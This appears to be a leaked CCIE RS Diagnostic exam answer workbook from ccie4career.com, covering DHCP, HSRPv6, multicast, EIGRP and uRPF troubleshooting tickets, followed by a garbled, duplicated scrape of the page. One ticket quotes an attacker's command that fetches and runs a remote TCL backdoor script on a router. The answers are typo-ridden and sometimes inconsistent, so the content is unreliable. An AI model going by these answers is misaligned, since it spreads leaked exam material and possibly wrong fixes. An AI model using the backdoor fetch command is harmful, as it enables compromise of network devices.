DIAG Workbook C4C V4.2-Use It

Ccie4career.
com Skype ID 1: ccie04final

Skype ID 2: nguyenbich279
CCIE4CAREER.COM - CCIE RS V5.0 DIAG

WORKBOOK
CCIE4career.com
Document Information
Author Combat C4C, CC Dreamer C4C
Skype ID1: ccie04final (NOT live:ccie04final)
Please Contact
Skype ID2: nguyenbich279 (NOT live:nguyenbich279)
Change Authority Advanced Team Focus
Version 1.5
Date updated 4/16/2019
Comment History Updated Solution
* Note: live:ccie04final and live:nguyenbich279 are falsified our Skype IDs.

Please avoid entering incorrect IDs.
CONTENTS
1. H3 .................................................................................................................................................... 3
1.1 Ticket 1 ..................................................................................................................................... 3
1.2 Ticket 2 ..................................................................................................................................... 5
2. H3+ ................................................................................................................................................. 8
2.1 Ticket 1 ..................................................................................................................................... 8
1
CCIE4Career.com
The best solution, very clear Workbook  The best way you can get CCIE Certificate.
Ccie4career.com Skype ID 1: ccie04final
2.2 Ticket 2 ................................................................................................................................... 10

3. H2 .................................................................................................................................................. 11
3.1 Ticket 1 ................................................................................................................................... 11
3.2 Ticket 2 ................................................................................................................................... 15
4. H2+ ............................................................................................................................................... 16
4.1 Ticket 1 ................................................................................................................................... 16
4.2 Ticket 2 ................................................................................................................................... 19
5. H1 .................................................................................................................................................. 20
5.1 Ticket 1 ................................................................................................................................... 20
5.2 Ticket 2 ................................................................................................................................... 22
5.3 Ticket 3 ................................................................................................................................... 23
6. H1+ ............................................................................................................................................... 26
6.1 Ticket 1 ................................................................................................................................... 26
6.2 Ticket 2 ................................................................................................................................... 27
6.3 Ticket 3 ................................................................................................................................... 29
2
CCIE4Career.com
1. H3
1.1 Ticket 1
Problem: Server 1 cannot get ip address

SW3#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
none
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled

circuit-id default format: vlan-mod-port
remote-id: aabb.cc00.6000 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Allow option Rate limit (pps)

----------------------- ------- ------------ ----------------
3
CCIE4Career.com
Question 1:
Which material is most helpful
Answer: (Click to Expand)
Device: SW1
Command: show ip dhcp relay information trused-sources
Question 2:
Which packets can help you find cause
Seq: 113, the packet is about DHCP discovery, source ip address of relay agent is
0.0.0.0
Question 3:
Where to capturing packeton topology
Between SW1-SW3
//How to find out the sequence 113 (or other sequence) to answer for question 2?
You have a clould shark file, you filter with command “bootp”. FIND the FIRST DHCP
Discovery packet and Select. Get your Sequence from that one. (you can see the
option is 82 and Relay agent (GIADDR) address is 0.0.0.0)
1.2 1.1.x Ticket 1 Variation
Problem: Helpdesk for DHCP issue
Question 1: Which packets can help you find cause (issue) ?

4
CCIE4Career.com
Sequence: 114
//Find this packets by using “bootp” in cloudshark/wireshark
Question 2: Why you choose above packet ?
Source IP of Relay Agent is 0.0.0.0 (the packet is about DHCP discovery,)
//you check that packet and have this source.
Question 3: Where to capturing packet on topology ?
Between SW1-SW3
1.3 Ticket 2
The material is capturing packets. You could find the capture packet in that link:
C4C DIAG Packet Capture
Please check video: DIAG-C4C-Int.mp4
Question 1:
What does the capture effetiverly shows? Select all that apply
TCP Connection from the router to 10.1.1.2
TCP Connection from 10.1.1.1 to one of the router’s VTY.
TCP Connection from a remote host to the router’s IP address 10.1.1.2 on port 1337.
Download of a TCL script in memory via HTTPs
Download of a TCL script in memory via HTTP
Installment of a ransomeware via a backdoor.
5
CCIE4Career.com
// Theory for this case are:
TCP connection from the router to Hacker
TCP connection from a remote host to router’s IP address of Victim on port 1337
The key here is find out which is IP address of Hacker and IP address of Victim.
From cloud shark/wireshark.
Use the command “http.request.method==GET”, the Source who do the GET are
Victim , the Dest are Hacker
Question 2:
Which command if issued from the hacker end can bring down the complete
system?
We have many options:
Sharkfest
Su env
Poweroff
Poweroff
//How to know this command in cloudshark/wireshark?

6
CCIE4Career.com
Method 1 : tcp.stream eq 4
The result of that is
7
CCIE4Career.com
Method 2 : search by tcp.port == 3001 or 1337
Question 3:
Which command attacker is using?
tclsh http://10.1.1.1/bd2.tcl
//The command here is “tclsh http://<hacker_ip_address>/b2d.tcl“ with

hacker ip address are result in question 1 .
2. H3+
2.1 Ticket 1
8
CCIE4Career.com
Problem: Server 1 cannot get ip address

SW3#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
none
DHCP snooping is operational on following VLANs:
none
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled

circuit-id default format: vlan-mod-port
remote-id: aabb.cc00.6000 (MAC)
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Allow option Rate limit (pps)

----------------------- ------- ------------ ----------------
Question 1:
Which material is most helpful
9
CCIE4Career.com
Command: show ip dhcp relay information trused-sources
Note: No choose device
Question 2:
Which packets can help you find cause
Seq: 114, the packet is about DHCP discovery, cource ip address is 0.0.0.0
Question 3:
Where to capturing packeton topology
Between SW1-SW3
//Find the Sequence number for Question 2 here are same with H3 Ticket 1 question
2 above.
2.2 Ticket 2
The material is capturing packets. You could find the capture packet in the link:
C4C DIAG Packet Capture
Please check video: DIAG-C4C-Int.mp4
Question 1:
What does the capture effetiverly shows? Select all that apply
Download of a TCL script in memory via HTTPs
Note: H3+ have 9 options but choose 4 options.

10
CCIE4Career.com
Question 2:
Which command if issued from the hacker end can bring down the complete
system?
We have many options:
Sharkfest
Su env
Poweroff
Poweroff
Question 3:
Which command attacker is using?
tclsh http://10.1.1.2/bd2.tcl
// For Cloudshark/Wireshark practice, you can do same with H3 ticket above.
3. H2
3.1 Ticket 1
Customer just setup a IPv6 Network, with HSRPv6 on R1 & R2. After setting up, all
hosts lose connection. What would you recommend to your L1 Engineer as a Quick
Fix?
CE1 key configuration
11
CCIE4Career.com
standby 1 priority 200
standby 1 preempt
ipv6 nd router-preference low

standby 1 preempt
ipv6 nd router-preference high
Description:
No IPv6 connection from LAN to Internet. CE1 and CE2 are configured in HSRP for
IPv6, CE1 is Active with Router-Preference Low and HSRP priority 200, CE2 is Standby
with RouterPreference High and HSRP priority 100. HSRP Preemption is configured
on both.
Issue:
Check console logs on Host, default route is pointing to FE80:::666. (because the
router with higher Router-preference, must have been configured with higher HSRP
priority. Only one router in HSRP groups is active, and current Active HSRP has “Low”
router-preference, but there is rouge device in LAN which has “Medium” better
router-preference, and hosts use information ND RA from Rouge device and select it
as Gateway)
Question 1:
How fast fix the problem.
Shutdown the link between CE2 and PE2.
Shutdown the link between CE1 and PE1.
Configure CE1 with highest HSRPv6 Priority.
Configure CE2 with highest HSRPv6 pirority.
Configure CE2 with low HSRPv6 priority.
Shutdown CE1 interface e0/0.
Shutdown PE2 interface e0/0.
Disable fast-switching on CE’s LAN.
Enable fast-switching on CE’s LAN.
Change HSRPv1 to HSRPv2 version
12
CCIE4Career.com
Configure CE2 with highest HSRP priority. (Make priority higher than CE1’s 200, so it
would become Active HSRP Router and start making Router Advertisements with
Route-Preference High)
Question 2:
What is the root cause of the problem caused by the current? Which deivce?
Problem caused by the current?
ARP snooping.
Routing issue.
Access-list blocking.
Default-gateway is link local address.
High preference gateway information is sent out.
HSPR device is configured with High priority.
Wrong HSRP configuration.
Miss default-gateway.
Device?
CE1
CE2
PE1
PE2
Host1
Host2
CE_DC
Server
Unknown deivce in CE’s LAN.
Unknown device in MPLS Core
Problem caused buy the current? Wrong HSRPv6 configuration.
Which device: CE1
13
CCIE4Career.com
Question 3:
Choose the first frame id that demonstrate your doubt?
Answer:
Active: #193
Wireshark line: RA from FE80:666
//Below is example help you to find out the frame number in Cloudshark/Wireshark.
Use filter in Cloudshark/Wireshark with command: “icmpv6.type==134” or

“icmpv6.nd.ra.flag.prf” the First frame of RA is the answer.
You could find the capture packet in the link: C4C DIAG Packet Capture
Or use another command
14
CCIE4Career.com
3.2 Ticket 2
You are working in the network team and one of your responsibilities is to solve
problems. There is a problem in multicast network in this morning and R3 cannot use
IPTV services. (it can be R2 as well)
Question 1:
What is the issue
R3 has no route to RP.
Question 2:
You will ask what to your engineer?
Why is 10.4.1.0 not in R3’s RIB
Question 3:
How to deal with current issues temporary?
15
CCIE4Career.com
R3(config)# ip mroute 10.4.1.1 255.255.255.255 10.0.0.17
// if don’t have that command then you choose:
R3(config)# ip route 10.4.1.1 255.255.255.255 10.0.0.17
4. H2+
4.1 Ticket 1
Customer just setup a IPv6 Network, with HSRPv6 on R1 & R2. After setting up, all
hosts lose connection. What would you recommend to your L1 Engineer as a Quick
Fix?
standby 1 priority 200
standby 1 preempt
ipv6 nd router-preference low
standby version 2

standby 1 preempt
ipv6 nd router-preference high
standby version 2
Description:
No IPv6 connection from LAN to Internet. CE1 and CE2 are configured in HSRP for
IPv6, CE1 is Active with Router-Preference Low and HSRP priority 200, CE2 is Standby
with RouterPreference High and HSRP priority 100. HSRP Preemption is configured
on both.
Issue:
Check console logs on Host, default route is pointing to FE80:::666. (because the
router with higher Router-preference, must have been configured with higher HSRP
priority. Only one router in HSRP groups is active, and current Active HSRP has “Low”
16
CCIE4Career.com
router-preference, but there is rouge device in LAN which has “Medium” better
router-preference, and hosts use information ND RA from Rouge device and select it
as Gateway)
Question 1:
How fast fix the problem.
1. Shutdown the link between CE2 and PE2.
2. Shutdown the link between CE1 and PE1.
3. Configure CE1 with highest HSRPv6 Priority.
4. Configure CE2 with low HSRPv6 priority.
5. Shutdown CE1 interface e0/0.
6. Shutdown PE2 interface e0/0.
7. Disable fast-switching on CE’s LAN.
8. Enable fast-switching on CE’s LAN.
9. Change HSRPv1 to HSRPv2 version
Shutdown CE1 interface e0/0.
Question 2:
What is the root cause of the problem caused by the current? Which deivce?
1. ARP snooping.
2. Routing issue.
3. Access-list blocking.
4. Default-gateway is link local address.
5. High preference gateway information is sent out.
6. HSPR device is configured with High priority.
7. Wrong HSRP configuration.
8. Miss default-gateway.
17
CCIE4Career.com
Device?
1. CE1
2. CE2
3. PE1
4. PE2
5. Host1
6. Host2
7. CE_DC
8. Server
9. Unknown deivce in CE’s LAN.
10. Unknown device in MPLS Core
High preference gateway information is sent out.
Which device:
Unknown deivce in CE’s LAN.
Question 3:
Choose the first frame id that demonstrate your doubt?
Active: #227
Wireshark line: 227-RA FE80::666
//use the same method with ticket 1 H2 to find out the Frame number.
You could find the capture packet in the link: C4C DIAG Packet Capture
18
CCIE4Career.com
4.2 Ticket 2
You are working in the network team and one of your responsibilities is to solve
problems. There is a problem in multicast network in this morning and R3 cannot use
IPTV services. (it can be R2 as well)
R2 show ip pim rp, you will see rp is 0.0.0.0
Question 1:
What is the issue
R2 has no route to RP.
Question 2:
You will ask what to your engineer?
Why is 10.4.1.0 not in R2’s RIB
Question 3:
How to deal with current issues temporary?
R2(config)# ip mroute 10.4.1.1 255.255.255.255 10.0.0.17
19
CCIE4Career.com
// If don’t have that command then you can choose:
R2(config)# ip route 10.4.1.1 255.255.255.255 10.0.0.17
5. H1
5.1 Ticket 1
Escalation from ACME Helpdesk:
PC cannot get ip address and access network after a maintenance. During the
maintenance yesterday, SW3 has been replaced by a new switch and tier 1 engineer
copy the output of show run and paste to the new deivce. Tier 1 engineer think it
may be a spanning-tree or vtp problem. Choose where and what information you
need to troubleshoot the problem.
Some output from Cisco:
SW1/SW2/SW3/SW4
interface Ethernet0/1
switchport trunk encapsulation dot1q
switchport mode trunk
!
SW3
switchport access vlan 10
switchport mode access
switchport port-security
switchport port-security mac-address aabb.cc00.2111
20
CCIE4Career.com
SW3
SW2#show ip int br
Interface IP-Address OK? Method Status
Protocol
Ethernet0/0 unassigned YES unset down down
Ethernet0/1 unassigned YES unset up up
Question 1:
The material provided in which one of the best to help you determine fault? Indicate
which command executed on which device provides the most important information
about the possible cause of this issue?
Device: SW3.
Command line: show ip interface brief.
Question 2:
Indicate which information collected on which device you require from the helpdesk
in order to confirm your suspicion
Collect on device: Host1
Required information: what’s the mac address of ethernet0/0
21
CCIE4Career.com
5.2 Ticket 2
Logging Message
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.17 (Tunnel0) is up: new adjacency
%DUAL-5_NBRCHANGE: EIGRP-IPv4 200: neighbor 215.0.0.17 (Tunnel0) is down: holding time expired
R16
ip address 145.67.89.14 255.255.255.252
duplex auto
speed auto
!
router eigrp 200
network 200.100.0.6 0.0.0.0
network 200.100.0.17 0.0.0.0
network 200.100.0.3 0.0.0.0
redistribute connected metric 1 1 1 1 1
R15
22
CCIE4Career.com
router eigrp 200
network 200.15.15.15 0.0.0.0
network 200.100.0.1 0.0.0.0
network 200.100.0.5 0.0.0.0
network 200.100.0.9 0.0.0.0
network 215.0.0.1 0.0.0.0
Question 1:
After considering all information provide. Point and click on the device that is
respoinsible for causing the reported symptoms.
Answer:
R15
Question 2:
Recommend a possible solution to this issue as well as on which device it must be

configured:
Answer:
Exclude the ip prefix of E0/0 into EIGRP
5.3 Ticket 3
R1
interface FastEthernet0/0
ip nat inside
ip nat inside
23
CCIE4Career.com
ip nat outside
ip nat outside
interface loopback 11
ip address 11.11.11.11 255.255.255.255
ip address 12.12.12.12 255.255.255.255
access-list 1 permit 10.1.0.0 0.0.255.255
ip nat inside source list 1 interface loopback 11 overload
PC1
ip address 10.1.1.1 255.255.255.0
PC2
ip address 10.2.1.1 255.255.255.0
PC1 ping 1.2.3.4 not success
PC2 ping 1.2.3.4 success.
Question 1:
URPF has been configured. The link between PE1 and CE is the main link, the link
between PE2 and CE is a backup link. After the main link failed, user inside can not
access through the backup link. Select step to troubleshooting
1. R1 looks up its RIB and select interface e2/0 as the egress interface.
2. R1 translates the source ip address to its interface loopback 11
3. R1 transmit the packet via interface e2/0
4. Packet are received by R3 and are forwarded to the destination.
5. The destination replies with an ICMP echo reply.
6. The echo reply is routed via R2
7. R2 transmit the echo reply to R1.
8. Unicast RPF on R1 drops the echo reply.
9. Packet area received by R3 and are forwarding to the destination.
11. R1 looks up its RIB and selects interface E1/0 as the egress interface.
24
CCIE4Career.com
12. R3 transmit the echo reply to R1.
13. R2 and R3 drop the packet due to missing routing information for the
destination.
14. The destination does not reply with an ICMP echo reply.
15. R2 transmit the Echo reply to R1.
16. R1 transmit the packet via interface e1/0.
17. R2 and R3 drop the packet due to missing routing information for the source.
18. R1 transmit the packet via interface e2/0.
19. Unicast RPF on R1 drop the Echo reply.
20. R1 translate the source ip address to its interface Lo 12.
21. R1 Looks up its RIB ans selects interface e2/0 as the egress interface.
22. An access-list on R1 drop the echo reply.
23. The destination replies with ICMP echo reply.
24. The echo reply is routed via R3.
25. The echo reply is routed via R2.
26. T1 translate the source IP addres its interface loopback 11.
1. R1 looks up its RIB and selects interface E2/0 as the egress interface.
2. R1 translate the source ip address to its interface lo 11.
3. R1 transmit the packet via interface E2/0
5. The destination reply with an ICMP echo reply
6. The Echo reply is routed via R2.
7. R2 transmit the Echo reply to R1
8. Unicast RPF on R1 drop Echo reply.
Question 2:
What is most likely cause of the problem?
25
CCIE4Career.com
1. Asymmetric routing with Unicast RPF.
2. Traffic dropped due to missing routing information.
3. Routing loop due to wrong BGP community configuration.
4. Traffic dropped by access-list
5. Traffic dropped due to oversubscribed input queue.
6. Traffic droppted due to oversubscribed ouput queue.
7. Traffic dropped due to NAT misconfiguration.
Asymmetric routing with Unicast RPF.
6. H1+
6.1 Ticket 1
Escalation from ACME Helpdesk:
PC cannot get ip address and access network after a maintenance. During the
maintenance yesterday, SW3 has been replaced by a new switch and tier 1 engineer
copy the output of show run and paste to the new deivce. Tier 1 engineer think it
may be a spanning-tree or vtp problem. Choose where and what information you
need to troubleshoot the problem.
Some output from Cisco:
SW1/SW2/SW3/SW4
!
26
CCIE4Career.com
SW3
switchport access vlan 10
switchport mode access
Question 1:
The material provided in which one of the best to help you determine fault? Indicate
which command executed on which device provides the most important information
about the possible cause of this issue?
Device: SW3.
Command line: show spanning-tree summary
Question 2:
Indicate which information collected on which device you require from the helpdesk
in order to confirm your suspicion
Collect on device: SW3
Required information: show vtp password
6.2 Ticket 2
27
CCIE4Career.com
Logging Message
R16
ip address 145.67.89.14 255.255.255.248
duplex auto
speed auto
!
router eigrp 200
network 200.100.0.6 0.0.0.0
network 200.100.0.17 0.0.0.0
network 200.100.0.3 0.0.0.0
R15
router eigrp 200
network 200.15.15.15 0.0.0.0
network 200.100.0.1 0.0.0.0
network 200.100.0.5 0.0.0.0
network 200.100.0.9 0.0.0.0
network 215.0.0.1 0.0.0.0
redistribute bgp 65200 metric 1 1 1 1 1 route-map CCIE
28
CCIE4Career.com
ip prefix-list CCIE seq 5 permit 0.0.0.0/0
route-map CCIE permit 10
match ip address prefix-list CCIE
Question 1:
After considering all information provide. Point and click on the device that is
respoinsible for causing the reported symptoms.
R16
Question 2:
Recommend a possible solution to this issue as well as on which device it must be

configured:
Increase the mask length of R16 interface e0/0
6.3 Ticket 3
R1
ip nat inside
ip nat inside
ip nat outside
29
CCIE4Career.com
ip nat outside
ip address 11.11.11.11 255.255.255.255
ip address 12.12.12.12 255.255.255.255
PC1
ip address 10.1.1.1 255.255.255.0
PC2
ip address 10.2.1.1 255.255.255.0
PC1 ping 1.2.3.4 not success
PC2 ping 1.2.3.4 success.
Note:
1. R1 is configured for eBGP multipath and uRPF loose mode; uses per destination
load-balance.
2. R2 and R3 are both uRPF Strict mode, they prefer route to Loopback11 and
Loopback 12 via R3-R1.
3. Logs on R1 (show ip cef exact route <hosts> internet> shows that if path is
towards R2, it is dropped on R2; if path is towards R3, it will NOT be dropped.
Question 1:
URPF has been configured. The link between PE1 and CE is the main link, the link
between PE2 and CE is a backup link. After the main link failed, user inside can not
access through the backup link. Select step to troubleshooting
1. R1 determines there are multi paths to destination based on per-destination.
2. R1 determines there is single paths to destination based on per destination.
3. R1 determines R3 as adjacency via F2/0.
5. R1 checks its ACL and decides (destination) IP address needs to be translated.
6. R1 sends packets via F1/0

30
CCIE4Career.com
8. R3 received the packet and check with its own ACL and determines R2 as
destination.
9. R2 received the packet and check with its own ACl and determines R1 as
destination.
10. R3 forwards the packet to R2 and R2 send it back to R3 and back and back and
forth.
11. R2 forwards the packet to R3 and R3 send it back to R2 and back and aback
and forth.
12. R2 drops the packet.
14. URPF fail
15. Netflow fail
1. R1 determines there is single paths to destination based on per destination.
3. R1 checks its ACL and decides (destination) IP address needs to be translated.
5. R3 received the packet and check with its own ACL and determines R2 as
destination.
6. R2 received the packet and check with its own ACl and determines R1 as
destination.
8. URPF fail
Question 2:
What is most likely cause of the problem?
Strict unicast RPF dropping packets and pre-destination load-balancing.
31
CCIE4Career.com

DIAG Workbook C4C V4.2-Use It

Загружено:

Сведения о документе

Исходное описание:

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

DIAG Workbook C4C V4.2-Use It

Загружено:

Авторское право:

Доступные форматы

Ccie4career.

com Skype ID 1: ccie04final

CCIE4CAREER.COM - CCIE RS V5.0 DIAG

* Note: live:ccie04final and live:nguyenbich279 are falsified our Skype IDs.

2.2 Ticket 2 ................................................................................................................................... 10

Problem: Server 1 cannot get ip address

Insertion of option 82 is enabled

Interface Trusted Allow option Rate limit (pps)

Which material is most helpful

Answer: (Click to Expand)

Command: show ip dhcp relay information trused-sources

Which packets can help you find cause

Answer: (Click to Expand)

Where to capturing packeton topology

Answer: (Click to Expand)

1.2 1.1.x Ticket 1 Variation

Problem: Helpdesk for DHCP issue

Question 1: Which packets can help you find cause (issue) ?

//Find this packets by using “bootp” in cloudshark/wireshark

Question 2: Why you choose above packet ?

Source IP of Relay Agent is 0.0.0.0 (the packet is about DHCP discovery,)

//you check that packet and have this source.

Question 3: Where to capturing packet on topology ?

Please check video: DIAG-C4C-Int.mp4

TCP Connection from the router to 10.1.1.2

TCP Connection from the router to 10.1.1.1

TCP Connection from 10.1.1.1 to one of the router’s VTY.

Download of a TCL script in memory via HTTPs

Download of a TCL script in memory via HTTP

Installment of a ransomeware via a backdoor.

Answer: (Click to Expand)

TCP Connection from the router to 10.1.1.1

Download of a TCL script in memory via HTTP

Installment of a ransomeware via a backdoor.

// Theory for this case are:

TCP connection from the router to Hacker

From cloud shark/wireshark.

We have many options:

Answer: (Click to Expand)

//How to know this command in cloudshark/wireshark?

The result of that is

Method 2 : search by tcp.port == 3001 or 1337

Which command attacker is using?

Answer: (Click to Expand)

//The command here is “tclsh http://<hacker_ip_address>/b2d.tcl“ with

Problem: Server 1 cannot get ip address

Insertion of option 82 is enabled

Interface Trusted Allow option Rate limit (pps)

Which material is most helpful

Answer: (Click to Expand)

Command: show ip dhcp relay information trused-sources

Note: No choose device

Which packets can help you find cause

Answer: (Click to Expand)

Where to capturing packeton topology

Answer: (Click to Expand)

Please check video: DIAG-C4C-Int.mp4

TCP Connection from the router to 10.1.1.2

TCP Connection from the router to 10.1.1.1

Download of a TCL script in memory via HTTPs

Download of a TCL script in memory via HTTP

Installment of a ransomeware via a backdoor.